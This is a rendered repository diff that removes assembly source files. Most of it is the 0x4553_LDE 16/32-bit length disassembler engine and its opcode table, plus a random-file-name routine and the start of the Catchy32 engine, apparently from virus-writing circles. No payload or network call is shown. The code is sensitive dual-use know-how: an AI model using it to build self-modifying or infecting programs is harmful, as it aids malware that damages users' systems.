add al, 97 ; Add 97 for getting lowercase letters
|
|
||||||
mov [rnd_file_name+ecx-1], al ; Save random letter
|
|
||||||
loop changetoletter
|
|
||||||
ret
|
|
||||||
|
|
||||||
random_byte:
|
|
||||||
invoke GetSystemTime, systemtime_struct ; Get first number
|
|
||||||
mov ebx, [rnd-2] ; ebx=number
|
|
||||||
add ebx, edx ; Making it pseudo-independent of time
|
|
||||||
sub ebx, ecx
|
|
||||||
xor ebx, eax
|
|
||||||
xchg bl, bh
|
|
||||||
pop ecx
|
|
||||||
push ecx
|
|
||||||
neg ebx
|
|
||||||
xor ebx, ecx ; ebx=pseudo-indepentend number
|
|
||||||
|
|
||||||
invoke GetTickCount ; Get second number
|
|
||||||
xor eax, ecx ; eax=number
|
|
||||||
neg ax ; Making it pseudo-independent of time
|
|
||||||
xor eax, edx
|
|
||||||
xor ah, al
|
|
||||||
sub eax, ebp
|
|
||||||
add eax, esi ; eax=pseudo-indepentend number
|
|
||||||
|
|
||||||
xor eax, ebx ; Compain the numbers -> eax
|
|
||||||
mov ebx, eax ; Save eax
|
|
||||||
shr eax, 8 ; e-part -> ax
|
|
||||||
xor ax, bx
|
|
||||||
xor al, ah ; al=number
|
|
||||||
ret
|
|
||||||
.end start
|
|
File diff suppressed because it is too large
Load Diff
Binary file not shown.
@ -1,901 +0,0 @@
|
|||||||
/*
|
|
||||||
*
|
|
||||||
* ____| | | _) ___| |
|
|
||||||
* __| | _ \ __| __| __| _ \ __ \ | __|\___ \ _ \ | | | __|
|
|
||||||
* | | __/ ( | | ( | | | | ( | ( | | | |\__ \
|
|
||||||
* _____|_|\___|\___|\__|_| \___/ _| _|_|\___|_____/ \___/ \____|_|____/
|
|
||||||
*
|
|
||||||
* Presents
|
|
||||||
*
|
|
||||||
* [ 0x4553_LDE - 16/32-bit Length Disassembler Engine ]
|
|
||||||
*
|
|
||||||
* (c) Ares, 2003
|
|
||||||
*
|
|
||||||
*[-----------------------------------------------------------------------------------]
|
|
||||||
* Description:
|
|
||||||
* It based on ADE32 disassembler engine by z0mbie, modified and ported to AT&T asm.
|
|
||||||
*
|
|
||||||
* table.h - contain table of opcodes from 0x00 to 0xFF,
|
|
||||||
* it define the type of each other.
|
|
||||||
*
|
|
||||||
* Usage:
|
|
||||||
* There is the main function l_disasm(). It get one parameter from stack,
|
|
||||||
* which point to array with data. Return value reside in %eax - length of opcode.
|
|
||||||
*
|
|
||||||
* Example:
|
|
||||||
* ...
|
|
||||||
* mov data,%eax
|
|
||||||
* add $123,%eax # data[123]
|
|
||||||
* push %eax
|
|
||||||
* call l_disasm
|
|
||||||
* ...
|
|
||||||
*
|
|
||||||
* Section Headers:
|
|
||||||
* [Nr] Name Type Addr Off Size ES Flg Lk Inf Al
|
|
||||||
* [ 0] NULL 00000000 000000 000000 00 0 0 0
|
|
||||||
* [ 1] .text PROGBITS 08048074 000074 0002c2 00 AX 0 0 4
|
|
||||||
* [ 2] .data PROGBITS 08049380 000380 000800 00 WA 0 0 4
|
|
||||||
* ...
|
|
||||||
* = AA5(hex) = 2725(dec)
|
|
||||||
*
|
|
||||||
*[-----------------------------------------------------------------------------------]
|
|
||||||
*
|
|
||||||
* version: 1.0BETA
|
|
||||||
*
|
|
||||||
*/
|
|
||||||
|
|
||||||
.include "table.h"
|
|
||||||
.text
|
|
||||||
# little defines
|
|
||||||
diza = 12
|
|
||||||
buffer = -4
|
|
||||||
flag1 = -52
|
|
||||||
flag2 = -51
|
|
||||||
opcode = -53
|
|
||||||
t = -60
|
|
||||||
mod = -61
|
|
||||||
rm = -62
|
|
||||||
a = -68
|
|
||||||
b = -72
|
|
||||||
counter = -76
|
|
||||||
|
|
||||||
.globl l_disasm
|
|
||||||
l_disasm:
|
|
||||||
pushl %ebp
|
|
||||||
movl %esp,%ebp
|
|
||||||
|
|
||||||
movl 8(%ebp),%eax
|
|
||||||
movl %eax,buffer(%ebp) # buf
|
|
||||||
leal -48(%ebp),%eax # temp diza structure
|
|
||||||
movl %eax,diza(%ebp) # diza
|
|
||||||
|
|
||||||
movb $4,1(%eax) # filling structure
|
|
||||||
movb $4,(%eax)
|
|
||||||
|
|
||||||
movl $0,flag1(%ebp) # flag1 = 0
|
|
||||||
|
|
||||||
loop:
|
|
||||||
movl buffer(%ebp),%eax
|
|
||||||
movb (%eax),%dl
|
|
||||||
movb %dl,opcode(%ebp) # opcode
|
|
||||||
incl buffer(%ebp) # buf++;
|
|
||||||
movzbl opcode(%ebp),%eax
|
|
||||||
leal 0(,%eax,4),%edx
|
|
||||||
movl $op_tab,%eax
|
|
||||||
movl (%edx,%eax),%edx
|
|
||||||
movl %edx,t(%ebp) # t = op_tab[opcode]
|
|
||||||
movb t(%ebp),%al
|
|
||||||
andb $0xF8,%al
|
|
||||||
testb %al,%al
|
|
||||||
je check_opcode
|
|
||||||
movl flag1(%ebp),%eax
|
|
||||||
andl t(%ebp),%eax
|
|
||||||
testl %eax,%eax
|
|
||||||
jne return
|
|
||||||
|
|
||||||
movl t(%ebp),%edx
|
|
||||||
orl %edx,flag1(%ebp)
|
|
||||||
|
|
||||||
# prefix/mod/rm/flags/opcodes...checking
|
|
||||||
# no reason to comment all this stuff...
|
|
||||||
|
|
||||||
check_prefix:
|
|
||||||
|
|
||||||
movb t(%ebp),%al
|
|
||||||
test %esi,%esi
|
|
||||||
jne chp1
|
|
||||||
andb $0x10,%al
|
|
||||||
testb %al,%al
|
|
||||||
je chp1
|
|
||||||
jmp chpn
|
|
||||||
chp1:
|
|
||||||
movb t(%ebp),%al
|
|
||||||
incl %esi
|
|
||||||
andb $0x20,%al
|
|
||||||
testb %al,%al
|
|
||||||
je cp_sub2
|
|
||||||
chpn:
|
|
||||||
movl diza(%ebp),%eax
|
|
||||||
movl diza(%ebp),%edx
|
|
||||||
movb 1(%edx),%cl
|
|
||||||
xorb $6,%cl
|
|
||||||
movb %cl,1(%eax)
|
|
||||||
jmp loop
|
|
||||||
|
|
||||||
cp_sub2:
|
|
||||||
movb t(%ebp),%al
|
|
||||||
andb $0x80,%al
|
|
||||||
testb %al,%al
|
|
||||||
je cp_sub3
|
|
||||||
movl diza(%ebp),%eax
|
|
||||||
movb opcode(%ebp),%dl
|
|
||||||
movb %dl,21(%eax)
|
|
||||||
jmp loop
|
|
||||||
|
|
||||||
cp_sub3:
|
|
||||||
movb t(%ebp),%al
|
|
||||||
andb $0x40,%al
|
|
||||||
testb %al,%al
|
|
||||||
je loop
|
|
||||||
movl diza(%ebp),%eax
|
|
||||||
movb opcode(%ebp),%dl
|
|
||||||
movb %dl,20(%eax)
|
|
||||||
|
|
||||||
check_opcode:
|
|
||||||
movl t(%ebp),%eax
|
|
||||||
orl %eax,flag1(%ebp)
|
|
||||||
movl diza(%ebp),%eax
|
|
||||||
movb opcode(%ebp),%dl
|
|
||||||
movb %dl,22(%eax)
|
|
||||||
cmpb $15,opcode(%ebp)
|
|
||||||
jne co_sub1
|
|
||||||
movl buffer(%ebp),%ebx
|
|
||||||
movb (%ebx),%al
|
|
||||||
movb %al,opcode(%ebp)
|
|
||||||
incl buffer(%ebp)
|
|
||||||
movl diza(%ebp),%eax
|
|
||||||
movb opcode(%ebp),%dl
|
|
||||||
movb %dl,23(%eax)
|
|
||||||
movzbl opcode(%ebp),%eax
|
|
||||||
leal 256(%eax),%edx
|
|
||||||
leal 0(,%edx,4),%eax
|
|
||||||
movl $op_tab,%edx
|
|
||||||
movl (%eax,%edx),%ecx
|
|
||||||
orl %ecx,flag1(%ebp)
|
|
||||||
cmpl $-1,flag1(%ebp)
|
|
||||||
jne check_mod
|
|
||||||
jmp return
|
|
||||||
|
|
||||||
co_sub1:
|
|
||||||
cmpb $0xF7,opcode(%ebp)
|
|
||||||
jne co_sub2
|
|
||||||
movl buffer(%ebp),%eax
|
|
||||||
movb (%eax),%dl
|
|
||||||
andb $0x38,%dl
|
|
||||||
testb %dl,%dl
|
|
||||||
jne check_mod
|
|
||||||
orb $0x20,flag2(%ebp)
|
|
||||||
jmp check_mod
|
|
||||||
|
|
||||||
co_sub2:
|
|
||||||
cmpb $0xF6,opcode(%ebp)
|
|
||||||
jne check_mod
|
|
||||||
movl buffer(%ebp),%eax
|
|
||||||
movb (%eax),%dl
|
|
||||||
andb $0x38,%dl
|
|
||||||
testb %dl,%dl
|
|
||||||
jne check_mod
|
|
||||||
orb $1,flag2(%ebp)
|
|
||||||
|
|
||||||
check_mod:
|
|
||||||
movl flag1(%ebp),%eax
|
|
||||||
andl $0x4000,%eax
|
|
||||||
testl %eax,%eax
|
|
||||||
je checks_complete
|
|
||||||
movl buffer(%ebp),%edi
|
|
||||||
movb (%edi),%al
|
|
||||||
movb %al,opcode(%ebp)
|
|
||||||
incl buffer(%ebp)
|
|
||||||
movl diza(%ebp),%eax
|
|
||||||
movb opcode(%ebp),%dl
|
|
||||||
movb %dl,24(%eax)
|
|
||||||
movb opcode(%ebp),%al
|
|
||||||
andb $0x38,%al
|
|
||||||
cmpb $0x20,%al
|
|
||||||
jne cm_sub1
|
|
||||||
movl diza(%ebp),%eax
|
|
||||||
cmpb $0xFF,22(%eax)
|
|
||||||
jne cm_sub1
|
|
||||||
orb $4,-50(%ebp) # flag
|
|
||||||
|
|
||||||
cm_sub1:
|
|
||||||
movb opcode(%ebp),%al
|
|
||||||
andb $0xC0,%al
|
|
||||||
movb %al,mod(%ebp)
|
|
||||||
movb opcode(%ebp),%dl
|
|
||||||
andb $7,%dl
|
|
||||||
movb %dl,rm(%ebp)
|
|
||||||
cmpb $0xC0,mod(%ebp)
|
|
||||||
je checks_complete
|
|
||||||
movl diza(%ebp),%eax
|
|
||||||
cmpb $4,(%eax)
|
|
||||||
jne cm_sub5
|
|
||||||
cmpb $4,rm(%ebp)
|
|
||||||
jne cm_sub2
|
|
||||||
orb $8,flag2(%ebp)
|
|
||||||
movl buffer(%ebp),%edi
|
|
||||||
movb (%edi),%al
|
|
||||||
movb %al,opcode(%ebp)
|
|
||||||
incl buffer(%ebp)
|
|
||||||
movl diza(%ebp),%eax
|
|
||||||
movb opcode(%ebp),%dl
|
|
||||||
movb %dl,25(%eax)
|
|
||||||
movb opcode(%ebp),%cl
|
|
||||||
andb $7,%cl
|
|
||||||
movb %cl,rm(%ebp)
|
|
||||||
|
|
||||||
cm_sub2:
|
|
||||||
cmpb $0x40,mod(%ebp)
|
|
||||||
jne cm_sub3
|
|
||||||
orb $1,flag1(%ebp)
|
|
||||||
jmp checks_complete
|
|
||||||
|
|
||||||
cm_sub3:
|
|
||||||
cmpb $0x80,mod(%ebp)
|
|
||||||
jne cm_sub4
|
|
||||||
orb $4,flag1(%ebp)
|
|
||||||
jmp checks_complete
|
|
||||||
|
|
||||||
cm_sub4:
|
|
||||||
cmpb $5,rm(%ebp)
|
|
||||||
jne checks_complete
|
|
||||||
orb $4,flag1(%ebp)
|
|
||||||
jmp checks_complete
|
|
||||||
|
|
||||||
cm_sub5:
|
|
||||||
cmpb $0x40,mod(%ebp)
|
|
||||||
jne cm_sub6
|
|
||||||
orb $1,flag1(%ebp)
|
|
||||||
jmp checks_complete
|
|
||||||
|
|
||||||
cm_sub6:
|
|
||||||
cmpb $0x80,mod(%ebp)
|
|
||||||
jne cm_sub7
|
|
||||||
orb $2,flag1(%ebp)
|
|
||||||
jmp checks_complete
|
|
||||||
|
|
||||||
cm_sub7:
|
|
||||||
cmpb $6,rm(%ebp)
|
|
||||||
jne checks_complete
|
|
||||||
orb $2,flag1(%ebp)
|
|
||||||
|
|
||||||
checks_complete:
|
|
||||||
movl diza(%ebp),%eax
|
|
||||||
movl flag1(%ebp),%edx
|
|
||||||
movl %edx,8(%eax)
|
|
||||||
movl flag1(%ebp),%eax
|
|
||||||
andl $7,%eax
|
|
||||||
movl %eax,a(%ebp)
|
|
||||||
|
|
||||||
movl flag1(%ebp),%edx
|
|
||||||
andl $0x700,%edx
|
|
||||||
shrl $8,%edx
|
|
||||||
movl %edx,b(%ebp)
|
|
||||||
movl flag1(%ebp),%eax
|
|
||||||
andl $0x1000,%eax
|
|
||||||
testl %eax,%eax
|
|
||||||
je cc_sub1
|
|
||||||
movl diza(%ebp),%eax
|
|
||||||
movzbl (%eax),%edx
|
|
||||||
addl %edx,a(%ebp)
|
|
||||||
|
|
||||||
cc_sub1:
|
|
||||||
movl flag1(%ebp),%eax
|
|
||||||
andl $0x2000,%eax
|
|
||||||
testl %eax,%eax
|
|
||||||
je cc_sub2
|
|
||||||
movl diza(%ebp),%eax
|
|
||||||
movzbl 1(%eax),%edx
|
|
||||||
addl %edx,b(%ebp)
|
|
||||||
cc_sub2:
|
|
||||||
movl diza(%ebp),%eax
|
|
||||||
movl a(%ebp),%edx
|
|
||||||
movl %edx,diza(%eax)
|
|
||||||
movl diza(%ebp),%eax
|
|
||||||
movl b(%ebp),%edx
|
|
||||||
movl %edx,16(%eax)
|
|
||||||
movl $0,counter(%ebp)
|
|
||||||
cc_sub3:
|
|
||||||
movl counter(%ebp),%eax
|
|
||||||
cmpl a(%ebp),%eax
|
|
||||||
jnb cc_sub4
|
|
||||||
movl diza(%ebp),%edx
|
|
||||||
leal 28(%edx),%eax
|
|
||||||
movl counter(%ebp),%edx
|
|
||||||
movl buffer(%ebp),%ecx
|
|
||||||
movl %ecx,(%edx,%eax)
|
|
||||||
incl buffer(%ebp)
|
|
||||||
incl counter(%ebp)
|
|
||||||
jmp cc_sub3
|
|
||||||
cc_sub4:
|
|
||||||
movl $0,counter(%ebp)
|
|
||||||
cc_sub5:
|
|
||||||
movl counter(%ebp),%eax
|
|
||||||
cmpl b(%ebp),%eax
|
|
||||||
jnb cc_sub6
|
|
||||||
movl diza(%ebp),%edx
|
|
||||||
leal 36(%edx),%eax
|
|
||||||
movl counter(%ebp),%edx
|
|
||||||
movl buffer(%ebp),%ecx
|
|
||||||
movl %ecx,(%edx,%eax)
|
|
||||||
incl buffer(%ebp)
|
|
||||||
incl counter(%ebp)
|
|
||||||
jmp cc_sub5
|
|
||||||
cc_sub6:
|
|
||||||
movl buffer(%ebp),%eax
|
|
||||||
subl 8(%ebp),%eax
|
|
||||||
|
|
||||||
return:
|
|
||||||
leave
|
|
||||||
ret
|
|
||||||
|
|
||||||
|
|
||||||
/****************************************************
|
|
||||||
.include "0x4553_LDE.s"
|
|
||||||
.globl main
|
|
||||||
main:
|
|
||||||
|
|
||||||
push %ebp
|
|
||||||
mov %esp,%ebp
|
|
||||||
|
|
||||||
push $2
|
|
||||||
push $file
|
|
||||||
call open
|
|
||||||
mov %eax,fd
|
|
||||||
|
|
||||||
push $424
|
|
||||||
call malloc
|
|
||||||
mov %eax,data
|
|
||||||
|
|
||||||
push $424
|
|
||||||
push data
|
|
||||||
push fd
|
|
||||||
call read
|
|
||||||
|
|
||||||
mov data,%eax
|
|
||||||
add $0x74,%eax # entry point, first instruction - xor %eax,%eax
|
|
||||||
push %eax
|
|
||||||
call l_disasm
|
|
||||||
|
|
||||||
push %eax
|
|
||||||
push $l
|
|
||||||
call printf
|
|
||||||
|
|
||||||
call exit
|
|
||||||
|
|
||||||
l:.string"Lenght of instruction: %d\n"
|
|
||||||
file: .string "test"
|
|
||||||
|
|
||||||
.comm fd,4,4
|
|
||||||
.comm data,424,4
|
|
||||||
*****************************************************/
|
|
||||||
|
|
||||||
/****************************************************
|
|
||||||
table.h
|
|
||||||
|
|
||||||
.globl op_tab
|
|
||||||
.data
|
|
||||||
op_tab:
|
|
||||||
.long 16384 # 0x00
|
|
||||||
.long 16384 # 0x01
|
|
||||||
.long 16384 # 0x02
|
|
||||||
.long 16384 # ...
|
|
||||||
.long 256
|
|
||||||
.long 8192
|
|
||||||
.long 32768
|
|
||||||
.long 32768
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 256
|
|
||||||
.long 8192
|
|
||||||
.long 32768
|
|
||||||
.long 65536
|
|
||||||
.long 49152
|
|
||||||
.long 16384
|
|
||||||
.long 49152
|
|
||||||
.long 16384
|
|
||||||
.long 33024
|
|
||||||
.long 40960
|
|
||||||
.long 32768
|
|
||||||
.long 32768
|
|
||||||
.long 49152
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 33024
|
|
||||||
.long 40960
|
|
||||||
.long 32768
|
|
||||||
.long 32768
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 256
|
|
||||||
.long 8192
|
|
||||||
.long 32896
|
|
||||||
.long 32768
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 256
|
|
||||||
.long 8192
|
|
||||||
.long 32896
|
|
||||||
.long 32768
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 256
|
|
||||||
.long 8192
|
|
||||||
.long 32896
|
|
||||||
.long 32768
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 256
|
|
||||||
.long 8192
|
|
||||||
.long 32896
|
|
||||||
.long 32768
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 32768
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 32768
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 32768
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 32768
|
|
||||||
.long 32768
|
|
||||||
.long 49152
|
|
||||||
.long 49152
|
|
||||||
.long 128
|
|
||||||
.long 32896
|
|
||||||
.long 32
|
|
||||||
.long 16
|
|
||||||
.long 8192
|
|
||||||
.long 24576
|
|
||||||
.long 256
|
|
||||||
.long 16640
|
|
||||||
.long 32768
|
|
||||||
.long 32768
|
|
||||||
.long 32768
|
|
||||||
.long 32768
|
|
||||||
.long 164096
|
|
||||||
.long 164096
|
|
||||||
.long 131328
|
|
||||||
.long 131328
|
|
||||||
.long 131328
|
|
||||||
.long 131328
|
|
||||||
.long 131328
|
|
||||||
.long 131328
|
|
||||||
.long 131328
|
|
||||||
.long 131328
|
|
||||||
.long 164096
|
|
||||||
.long 164096
|
|
||||||
.long 131328
|
|
||||||
.long 131328
|
|
||||||
.long 131328
|
|
||||||
.long 131328
|
|
||||||
.long 16640
|
|
||||||
.long 24576
|
|
||||||
.long 49408
|
|
||||||
.long 16640
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 49152
|
|
||||||
.long 16384
|
|
||||||
.long 49152
|
|
||||||
.long 16384
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 32768
|
|
||||||
.long 32768
|
|
||||||
.long 32768
|
|
||||||
.long 32768
|
|
||||||
.long 32768
|
|
||||||
.long 32768
|
|
||||||
.long 0
|
|
||||||
.long 41472
|
|
||||||
.long 0
|
|
||||||
.long 32768
|
|
||||||
.long 32768
|
|
||||||
.long 32768
|
|
||||||
.long 32768
|
|
||||||
.long 4096
|
|
||||||
.long 4096
|
|
||||||
.long 4096
|
|
||||||
.long 4096
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 256
|
|
||||||
.long 8192
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 32768
|
|
||||||
.long 0
|
|
||||||
.long 32768
|
|
||||||
.long 256
|
|
||||||
.long 256
|
|
||||||
.long 256
|
|
||||||
.long 256
|
|
||||||
.long 256
|
|
||||||
.long 256
|
|
||||||
.long 33024
|
|
||||||
.long 33024
|
|
||||||
.long 8192
|
|
||||||
.long 8192
|
|
||||||
.long 8192
|
|
||||||
.long 8192
|
|
||||||
.long 40960
|
|
||||||
.long 8192
|
|
||||||
.long 8192
|
|
||||||
.long 8192
|
|
||||||
.long 16640
|
|
||||||
.long 16640
|
|
||||||
.long 262656
|
|
||||||
.long 262144
|
|
||||||
.long 49152
|
|
||||||
.long 49152
|
|
||||||
.long 16640
|
|
||||||
.long 24576
|
|
||||||
.long 768
|
|
||||||
.long 0
|
|
||||||
.long 295424
|
|
||||||
.long 294912
|
|
||||||
.long 32768
|
|
||||||
.long 256
|
|
||||||
.long 32768
|
|
||||||
.long 294912
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 33024
|
|
||||||
.long 33024
|
|
||||||
.long 32768
|
|
||||||
.long 32768
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 164096
|
|
||||||
.long 164096
|
|
||||||
.long 131328
|
|
||||||
.long 131328
|
|
||||||
.long 33024
|
|
||||||
.long 33024
|
|
||||||
.long 33024
|
|
||||||
.long 33024
|
|
||||||
.long 139264
|
|
||||||
.long 401408
|
|
||||||
.long 41472
|
|
||||||
.long 393472
|
|
||||||
.long 32768
|
|
||||||
.long 32768
|
|
||||||
.long 32768
|
|
||||||
.long 32768
|
|
||||||
.long 32776
|
|
||||||
.long 32768
|
|
||||||
.long 64
|
|
||||||
.long 64
|
|
||||||
.long 32768
|
|
||||||
.long 32768
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 32768
|
|
||||||
.long 32768
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long 0
|
|
||||||
.long -1
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long 139264
|
|
||||||
.long 139264
|
|
||||||
.long 139264
|
|
||||||
.long 139264
|
|
||||||
.long 139264
|
|
||||||
.long 139264
|
|
||||||
.long 139264
|
|
||||||
.long 139264
|
|
||||||
.long 139264
|
|
||||||
.long 139264
|
|
||||||
.long 139264
|
|
||||||
.long 139264
|
|
||||||
.long 139264
|
|
||||||
.long 139264
|
|
||||||
.long 139264
|
|
||||||
.long 139264
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 16384
|
|
||||||
.long 16640
|
|
||||||
.long 16384
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 16384
|
|
||||||
.long 16640
|
|
||||||
.long 16384
|
|
||||||
.long -1
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long 16640
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long 16384
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long 256
|
|
||||||
.long 0
|
|
||||||
.long 0
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1
|
|
||||||
.long -1 # 0xff
|
|
||||||
*****************************************************/
|
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
@ -1,174 +0,0 @@
|
|||||||
; Catchy32 v1.6-2 - Length Disassembler Engine 32bit
|
|
||||||
; original source Catchy32.inc-orig (c) sars [HI-TECH] 2003
|
|
||||||
; this slightly opimized version - herm1t'2004
|
|
||||||
BITS 32
|
|
||||||
CPU 386
|
|
||||||
global catchy32
|
|
||||||
|
|
||||||
pref66h equ 1
|
|
||||||
pref67h equ 2
|
|
||||||
|
|
||||||
catchy32: pushad
